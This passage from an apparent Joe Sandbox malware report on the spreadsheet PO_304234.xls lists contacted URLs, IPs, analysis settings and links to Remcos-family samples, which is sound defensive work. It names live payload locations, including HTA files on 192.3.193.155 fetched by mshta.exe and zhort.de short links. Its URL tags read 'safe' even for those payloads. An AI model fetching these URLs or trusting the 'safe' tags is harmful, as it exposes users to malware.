                  http://192.3.193.155/9VEBmshta.exe, 00000004.00000003.406238458.0000000003D8D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407420023.0000000003D8D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406931949.0000000003D8D000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://ocsp.entrust.net0Dmshta.exe, 00000004.00000003.406238458.0000000003D48000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406931949.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407420023.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.430524166.000000001C2C8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.456093147.000000001C4BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.456093468.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.455142780.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.452264876.000000000355E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000002.457516278.0000000003561000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.485622562.000000001B5F5000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://zhort.de/inGmshta.exe, 00000004.00000003.406942451.0000000000593000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407320806.0000000000593000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000007.00000002.423275187.00000000023E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.459682593.0000000002421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.436681548.0000000002421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.464588377.0000000002361000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.488464745.0000000002475000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.477435438.00000000024E1000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://192.3.193.155/xampp/boz/bz/IEnetworkroundthings.hta:KWWSmshta.exe, 00000011.00000002.458485189.0000000004EF0000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://go.crpowershell.exe, 00000007.00000002.430127425.000000001A6FD000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://192.3.193.155/xampp/boz/wecreatedbuttersmoothbutterthings.tIFppowershell.exe, 00000007.00000002.423275187.00000000025E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.464588377.0000000002563000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://nuget.org/NuGet.exepowershell.exe, 00000007.00000002.429788312.0000000012411000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://zhort.de/pitash;fmshta.exe, 00000011.00000002.456621218.000000000039E000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://crl.entrust.net/server1.crl0mshta.exe, 00000004.00000003.406238458.0000000003D48000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406931949.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407420023.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.430524166.000000001C2C8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.430524166.000000001C2E8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.456093147.000000001C4BD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.456093147.000000001C490000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.456093468.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.455142780.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.452264876.000000000355E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000002.457516278.0000000003561000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.485622562.000000001B5F5000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://192.3.193.155/xampp/boz/bz/IEnetworkroundthings.htahttp://192.3.193.155/xampp/boz/bz/IEnetwormshta.exe, 00000004.00000003.407059010.0000000003055000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.451499028.0000000003175000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.454477370.0000000003175000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://zhort.de//rmshta.exe, 00000011.00000003.456093468.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.455142780.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.452264876.000000000355E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000002.457516278.0000000003561000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://contoso.com/Iconpowershell.exe, 00000007.00000002.429788312.0000000012411000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://192.3.193.155/xampp/boz/bz/IEnetworkroundthings.htaC:mshta.exe, 00000011.00000003.454822112.0000000000444000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000002.456910082.0000000000444000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://192.3.193.155/xampp/boz/bz/IEnetworkroundthings.htaFC:mshta.exe, 00000011.00000003.456093468.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.455142780.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.452264876.000000000355E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000002.457516278.0000000003561000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://zhort.de/E3mshta.exe, 00000004.00000003.406942451.0000000000593000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407320806.0000000000593000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://zhort.de/tmshta.exe, 00000004.00000003.406238458.0000000003D48000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406931949.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407420023.0000000003D49000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://geoplugin.net/json.gpjfRegAsm.exe, 0000000F.00000002.842261724.000000000066C000.00000004.00000020.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  http://crl.pkioverheid.nl/DomOvLatestCRL.crl0mshta.exe, 00000004.00000003.406238458.0000000003D48000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406931949.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407420023.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.430524166.000000001C2C8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.430524166.000000001C2E8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.456093147.000000001C490000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.456093468.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.455142780.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.452264876.000000000355E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000002.457516278.0000000003561000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.485622562.000000001B5F5000.00000004.00000020.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://zhort.de/pitashtamshta.exe, 00000011.00000003.456093468.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.455142780.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.452264876.000000000355E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000002.457516278.0000000003561000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://192.3.193.155/xampp/boz/bz/IEnetworkroundthings.htacmshta.exe, 00000004.00000003.406238458.0000000003D48000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406931949.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407420023.0000000003D49000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://192.3.193.155/xampp/boz/bz/IEnetworkroundthings.htakmshta.exe, 00000004.00000003.406238458.0000000003D48000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406931949.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407420023.0000000003D49000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://192.3.193.155/xampp/boz/bz/IEnetworkroundthings.htac;EBmshta.exe, 00000004.00000003.406238458.0000000003D48000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406931949.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407420023.0000000003D49000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://192.3.193.155/xampp/boz/wpowershell.exe, 00000007.00000002.423275187.00000000025E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.464588377.0000000002563000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://192.3.193.155/xampp/boz/wecreatedbuttersmoothbutterthings.tIF34e089$powershell.exe, 00000007.00000002.430127425.000000001A765000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://zhort.de/pitashzWEBmshta.exe, 00000004.00000002.407298326.000000000050A000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://zhort.de/pitashvWEBmshta.exe, 00000004.00000002.407298326.000000000050A000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://192.3.193.155/mshta.exe, 00000011.00000003.456093468.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.455142780.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.452264876.000000000355E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000002.457516278.0000000003561000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://192.3.193.155/xampp/boz/wecreatedbuttersmoothbutterthings.tIF34e089powershell.exe, 00000014.00000002.472157211.000000001ADDB000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://secure.comodo.com/CPS0mshta.exe, 00000004.00000003.406238458.0000000003D48000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406931949.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407420023.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.430524166.000000001C2C8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.430524166.000000001C260000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.430524166.000000001C2E8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.454968289.000000001A920000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.456093147.000000001C4BD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.456093147.000000001C490000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.456093468.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.455142780.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.452264876.000000000355E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000002.457516278.0000000003561000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.484986684.000000001ACFA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.485622562.000000001B5F5000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://zhort.de/mshta.exe, 00000004.00000003.406238458.0000000003D48000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406931949.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407420023.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.454822112.0000000000444000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000002.456910082.0000000000444000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://crl.entrust.net/2048ca.crl0mshta.exe, 00000004.00000003.406238458.0000000003D48000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.406931949.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.407420023.0000000003D49000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.430524166.000000001C2C8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.456093147.000000001C4BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.456093468.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.455142780.000000000355F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000003.452264876.000000000355E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000011.00000002.457516278.0000000003561000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.485622562.000000001B5F5000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown

                  World Map of Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public IPs

                  IPDomainCountryFlagASNASN NameMalicious
                  192.3.64.135
                  		cloudsave.duckdns.orgUnited States
                  		36352AS-COLOCROSSINGUStrue
                  207.241.232.154
                  		ia803104.us.archive.orgUnited States
                  		7941INTERNET-ARCHIVEUStrue
                  88.99.66.38
                  		zhort.deGermany
                  		24940HETZNER-ASDEfalse
                  178.237.33.50
                  		geoplugin.netNetherlands
                  		8455ATOM86-ASATOM86NLfalse
                  192.3.193.155
                  		unknownUnited States
                  		36352AS-COLOCROSSINGUStrue

                  General Information

                  Joe Sandbox version:40.0.0 Tourmaline
                  Analysis ID:1500265
                  Start date and time:2024-08-28 06:55:14 +02:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 9m 13s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:defaultwindowsofficecookbook.jbs
                  Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                  Number of analysed new started processes analysed:31
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • GSI enabled (VBA)
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:PO_304234.xls
                  Detection:MAL
                  Classification:mal100.troj.spyw.expl.evad.winXLS@35/38@7/5
                  EGA Information:
                  • Successful, ratio: 60%
                  HCA Information:
                  • Successful, ratio: 98%
                  • Number of executed functions: 45
                  • Number of non-executed functions: 207
                  Cookbook Comments:
                  • Found application associated with file extension: .xls
                  • Found Word or Excel or PowerPoint or XPS Viewer
                  • Attach to Office via COM
                  • Active ActiveX Object
                  • Active ActiveX Object
                  • Scroll down
                  • Close Viewer
                  • Override analysis time to 68778.6749910307 for current running targets taking high CPU consumption
                  • Override analysis time to 137557.349982061 for current running targets taking high CPU consumption

                  Warnings

                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
                  • Execution Graph export aborted for target mshta.exe, PID 1960 because there are no executed function
                  • Execution Graph export aborted for target mshta.exe, PID 3776 because there are no executed function
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  00:56:27API Interceptor81x Sleep call for process: mshta.exe modified
                  00:56:30API Interceptor396x Sleep call for process: powershell.exe modified
                  00:56:38API Interceptor22x Sleep call for process: wscript.exe modified
                  00:56:44API Interceptor4220562x Sleep call for process: RegAsm.exe modified

                  Joe Sandbox View / Context

                  IPs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  192.3.64.135Orden.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                  • 192.3.64.135/okeydookietrational.txt
                  Confirmaciones de datos bancarios.xlsxGet hashmaliciousUnknownBrowse
                  • 192.3.64.135/euros2024.jpeg
                  207.241.232.154RFQ No. 109078906v.xla.xlsxGet hashmaliciousRemcosBrowse
                    SecuriteInfo.com.Exploit.CVE-2017-11882.123.24463.26706.rtfGet hashmaliciousRemcosBrowse
                      SecuriteInfo.com.Exploit.CVE-2017-11882.123.10965.14600.rtfGet hashmaliciousRemcosBrowse
                        another.rtfGet hashmaliciousRemcosBrowse
                          Faktura.vbsGet hashmaliciousRemcosBrowse
                            M12_20240821.xlsGet hashmaliciousRemcosBrowse
                              PO_20931.xlsGet hashmaliciousRemcosBrowse
                                PO082724.xlsGet hashmaliciousRemcosBrowse
                                  PA-INV0230824 AUG.xla.xlsxGet hashmaliciousRemcosBrowse
                                    RFQ No. 109078906v.xla.xlsxGet hashmaliciousRemcosBrowse
                                      88.99.66.38RFQ No. 109078906v.xla.xlsxGet hashmaliciousRemcosBrowse
                                        M12_20240821.xlsGet hashmaliciousRemcosBrowse
                                          PO_20931.xlsGet hashmaliciousRemcosBrowse
                                            350.xlsGet hashmaliciousFormBookBrowse
                                              PO082724.xlsGet hashmaliciousRemcosBrowse
                                                SecuriteInfo.com.Trojan-Downloader.Office.Doc.30581.16938.xlsxGet hashmaliciousUnknownBrowse
                                                  SWIFT COPY.xlsGet hashmaliciousRemcosBrowse
                                                    RFQ_0826024.xla.xlsxGet hashmaliciousRemcosBrowse
                                                      178.237.33.50RFQ No. 109078906v.xla.xlsxGet hashmaliciousRemcosBrowse
                                                      • geoplugin.net/json.gp
                                                      SecuriteInfo.com.Exploit.CVE-2017-11882.123.24463.26706.rtfGet hashmaliciousRemcosBrowse
                                                      • geoplugin.net/json.gp
                                                      SecuriteInfo.com.Exploit.CVE-2017-11882.123.10965.14600.rtfGet hashmaliciousRemcosBrowse
                                                      • geoplugin.net/json.gp
                                                      another.rtfGet hashmaliciousRemcosBrowse
                                                      • geoplugin.net/json.gp
                                                      rnr.exeGet hashmaliciousRemcosBrowse
                                                      • geoplugin.net/json.gp
                                                      thrylPXnvfySmGN.exeGet hashmaliciousRemcosBrowse
                                                      • geoplugin.net/json.gp
                                                      SecuriteInfo.com.BackDoor.AgentTeslaNET.37.11054.31488.exeGet hashmaliciousRemcosBrowse
                                                      • geoplugin.net/json.gp
                                                      PRICE REQUEST RSM PQ24.docx.docGet hashmaliciousRemcosBrowse
                                                      • geoplugin.net/json.gp
                                                      Faktura.vbsGet hashmaliciousRemcosBrowse
                                                      • geoplugin.net/json.gp
                                                      M12_20240821.xlsGet hashmaliciousRemcosBrowse
                                                      • geoplugin.net/json.gp

                                                      Domains

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      cloudsave.duckdns.orgPO_20931.xlsGet hashmaliciousRemcosBrowse
                                                      • 192.3.64.135
                                                      SecuriteInfo.com.Exploit.CVE-2017-11882.123.8799.4691.rtfGet hashmaliciousRemcosBrowse
                                                      • 192.3.64.135
                                                      X-2901-24.xlsGet hashmaliciousRemcosBrowse
                                                      • 192.3.64.135
                                                      zhort.deRFQ No. 109078906v.xla.xlsxGet hashmaliciousRemcosBrowse
                                                      • 88.99.66.38
                                                      M12_20240821.xlsGet hashmaliciousRemcosBrowse
                                                      • 88.99.66.38
                                                      PO_20931.xlsGet hashmaliciousRemcosBrowse
                                                      • 88.99.66.38
                                                      350.xlsGet hashmaliciousFormBookBrowse
                                                      • 88.99.66.38
                                                      PO082724.xlsGet hashmaliciousRemcosBrowse
                                                      • 88.99.66.38
                                                      SecuriteInfo.com.Trojan-Downloader.Office.Doc.30581.16938.xlsxGet hashmaliciousUnknownBrowse
                                                      • 88.99.66.38
                                                      SWIFT COPY.xlsGet hashmaliciousRemcosBrowse
                                                      • 88.99.66.38
                                                      RFQ_0826024.xla.xlsxGet hashmaliciousRemcosBrowse
                                                      • 88.99.66.38
                                                      ia803104.us.archive.orgRFQ No. 109078906v.xla.xlsxGet hashmaliciousRemcosBrowse
                                                      • 207.241.232.154
                                                      SecuriteInfo.com.Exploit.CVE-2017-11882.123.24463.26706.rtfGet hashmaliciousRemcosBrowse
                                                      • 207.241.232.154
                                                      SecuriteInfo.com.Exploit.CVE-2017-11882.123.10965.14600.rtfGet hashmaliciousRemcosBrowse
                                                      • 207.241.232.154
                                                      another.rtfGet hashmaliciousRemcosBrowse
                                                      • 207.241.232.154
                                                      Faktura.vbsGet hashmaliciousRemcosBrowse
                                                      • 207.241.232.154
                                                      M12_20240821.xlsGet hashmaliciousRemcosBrowse
                                                      • 207.241.232.154
                                                      PO_20931.xlsGet hashmaliciousRemcosBrowse
                                                      • 207.241.232.154
                                                      PO082724.xlsGet hashmaliciousRemcosBrowse
                                                      • 207.241.232.154
                                                      PA-INV0230824 AUG.xla.xlsxGet hashmaliciousRemcosBrowse
                                                      • 207.241.232.154
                                                      RFQ No. 109078906v.xla.xlsxGet hashmaliciousRemcosBrowse
                                                      • 207.241.232.154
                                                      geoplugin.netRFQ No. 109078906v.xla.xlsxGet hashmaliciousRemcosBrowse
                                                      • 178.237.33.50
                                                      SecuriteInfo.com.Exploit.CVE-2017-11882.123.24463.26706.rtfGet hashmaliciousRemcosBrowse
                                                      • 178.237.33.50
                                                      SecuriteInfo.com.Exploit.CVE-2017-11882.123.10965.14600.rtfGet hashmaliciousRemcosBrowse
                                                      • 178.237.33.50
                                                      another.rtfGet hashmaliciousRemcosBrowse
                                                      • 178.237.33.50
                                                      rnr.exeGet hashmaliciousRemcosBrowse
                                                      • 178.237.33.50
                                                      thrylPXnvfySmGN.exeGet hashmaliciousRemcosBrowse
                                                      • 178.237.33.50
                                                      SecuriteInfo.com.BackDoor.AgentTeslaNET.37.11054.31488.exeGet hashmaliciousRemcosBrowse
                                                      • 178.237.33.50
                                                      PRICE REQUEST RSM PQ24.docx.docGet hashmaliciousRemcosBrowse
                                                      • 178.237.33.50
                                                      Faktura.vbsGet hashmaliciousRemcosBrowse
                                                      • 178.237.33.50
                                                      M12_20240821.xlsGet hashmaliciousRemcosBrowse
                                                      • 178.237.33.50

                                                      ASNs

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      AS-COLOCROSSINGUSRFQ No. 109078906v.xla.xlsxGet hashmaliciousRemcosBrowse
                                                      • 107.172.31.21
                                                      SecuriteInfo.com.Exploit.CVE-2017-11882.123.24463.26706.rtfGet hashmaliciousRemcosBrowse
                                                      • 107.172.31.21
                                                      SecuriteInfo.com.Exploit.CVE-2017-11882.123.10965.14600.rtfGet hashmaliciousRemcosBrowse
                                                      • 198.46.178.181
                                                      another.rtfGet hashmaliciousRemcosBrowse
                                                      • 198.46.178.137
                                                      RFQ No. 109078906.xla.xlsxGet hashmaliciousUnknownBrowse
                                                      • 192.210.214.138
                                                      RFQ No. 109078906.xla.xlsxGet hashmaliciousUnknownBrowse
                                                      • 192.210.214.138
                                                      RFQ No. 109078906.xla.xlsxGet hashmaliciousUnknownBrowse
                                                      • 192.210.214.138
                                                      PO_20931.xlsGet hashmaliciousRemcosBrowse
                                                      • 192.3.64.135
                                                      PO082724.xlsGet hashmaliciousRemcosBrowse
                                                      • 198.46.178.137
                                                      Inv 30532.xlsGet hashmaliciousRemcosBrowse
                                                      • 198.12.81.225
                                                      INTERNET-ARCHIVEUSRFQ No. 109078906v.xla.xlsxGet hashmaliciousRemcosBrowse
                                                      • 207.241.232.154
                                                      SecuriteInfo.com.Exploit.CVE-2017-11882.123.24463.26706.rtfGet hashmaliciousRemcosBrowse
                                                      • 207.241.232.154
                                                      SecuriteInfo.com.Exploit.CVE-2017-11882.123.10965.14600.rtfGet hashmaliciousRemcosBrowse
                                                      • 207.241.232.154
                                                      another.rtfGet hashmaliciousRemcosBrowse
                                                      • 207.241.232.154
                                                      Faktura.vbsGet hashmaliciousRemcosBrowse
                                                      • 207.241.232.154
                                                      M12_20240821.xlsGet hashmaliciousRemcosBrowse
                                                      • 207.241.232.154
                                                      PO_20931.xlsGet hashmaliciousRemcosBrowse
                                                      • 207.241.232.154
                                                      PO082724.xlsGet hashmaliciousRemcosBrowse
                                                      • 207.241.232.154
                                                      PA-INV0230824 AUG.xla.xlsxGet hashmaliciousRemcosBrowse
                                                      • 207.241.232.154
                                                      RFQ No. 109078906v.xla.xlsxGet hashmaliciousRemcosBrowse
                                                      • 207.241.232.154
                                                      ATOM86-ASATOM86NLRFQ No. 109078906v.xla.xlsxGet hashmaliciousRemcosBrowse
                                                      • 178.237.33.50
                                                      SecuriteInfo.com.Exploit.CVE-2017-11882.123.24463.26706.rtfGet hashmaliciousRemcosBrowse
                                                      • 178.237.33.50
                                                      SecuriteInfo.com.Exploit.CVE-2017-11882.123.10965.14600.rtfGet hashmaliciousRemcosBrowse
                                                      • 178.237.33.50
                                                      another.rtfGet hashmaliciousRemcosBrowse
                                                      • 178.237.33.50
                                                      rnr.exeGet hashmaliciousRemcosBrowse
                                                      • 178.237.33.50
                                                      thrylPXnvfySmGN.exeGet hashmaliciousRemcosBrowse
                                                      • 178.237.33.50
                                                      SecuriteInfo.com.BackDoor.AgentTeslaNET.37.11054.31488.exeGet hashmaliciousRemcosBrowse
                                                      • 178.237.33.50
                                                      PRICE REQUEST RSM PQ24.docx.docGet hashmaliciousRemcosBrowse
                                                      • 178.237.33.50
                                                      Faktura.vbsGet hashmaliciousRemcosBrowse
                                                      • 178.237.33.50
                                                      M12_20240821.xlsGet hashmaliciousRemcosBrowse
                                                      • 178.237.33.50
                                                      HETZNER-ASDERFQ No. 109078906v.xla.xlsxGet hashmaliciousRemcosBrowse
                                                      • 88.99.66.38
                                                      ZKB - Zahlungsbest#U00e4tigung an 20240828.pdf.exeGet hashmaliciousQuasarBrowse
                                                      • 195.201.57.90
                                                      file.exeGet hashmaliciousLummaC, VidarBrowse
                                                      • 94.130.188.148
                                                      file.exeGet hashmaliciousLummaC, VidarBrowse
                                                      • 94.130.188.148
                                                      file.exeGet hashmaliciousLummaC, VidarBrowse
                                                      • 94.130.188.148
                                                      Setup.exeGet hashmaliciousVidarBrowse
                                                      • 94.130.188.148
                                                      file.exeGet hashmaliciousVidarBrowse
                                                      • 94.130.188.148
                                                      Vak#U0131fBank - #U00d6deme onay makbuzu 20240826.pdf.exeGet hashmaliciousQuasarBrowse
                                                      • 195.201.57.90
                                                      Faktura.vbsGet hashmaliciousRemcosBrowse
                                                      • 135.181.213.52
                                                      M12_20240821.xlsGet hashmaliciousRemcosBrowse
                                                      • 88.99.66.38

                                                      JA3 Fingerprints

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      05af1f5ca1b87cc9cc9b25185115607dRFQ No. 109078906v.xla.xlsxGet hashmaliciousRemcosBrowse
                                                      • 207.241.232.154
                                                      SecuriteInfo.com.Exploit.CVE-2017-11882.123.24463.26706.rtfGet hashmaliciousRemcosBrowse
                                                      • 207.241.232.154
                                                      SecuriteInfo.com.Exploit.CVE-2017-11882.123.10965.14600.rtfGet hashmaliciousRemcosBrowse
                                                      • 207.241.232.154
                                                      another.rtfGet hashmaliciousRemcosBrowse
                                                      • 207.241.232.154
                                                      M12_20240821.xlsGet hashmaliciousRemcosBrowse
                                                      • 207.241.232.154
